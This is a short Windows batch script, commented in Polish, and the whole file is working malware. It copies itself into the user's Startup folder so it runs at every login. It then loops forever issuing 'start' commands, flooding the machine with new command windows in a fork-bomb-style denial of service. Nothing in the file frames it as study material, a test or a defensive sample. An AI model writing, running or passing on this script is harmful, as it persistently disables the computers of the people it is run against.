@echo off
setlocal

set "startup=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

set "me=%~f0"

set "dest=%startup%\loop.bat"

if /i not "%me%"=="%dest%" (
    copy "%me%" "%dest%" >nul
    exit
)

:: Właściwa część – nieskończona pętla otwierania okien
:loop
start
start
start
start
goto loop
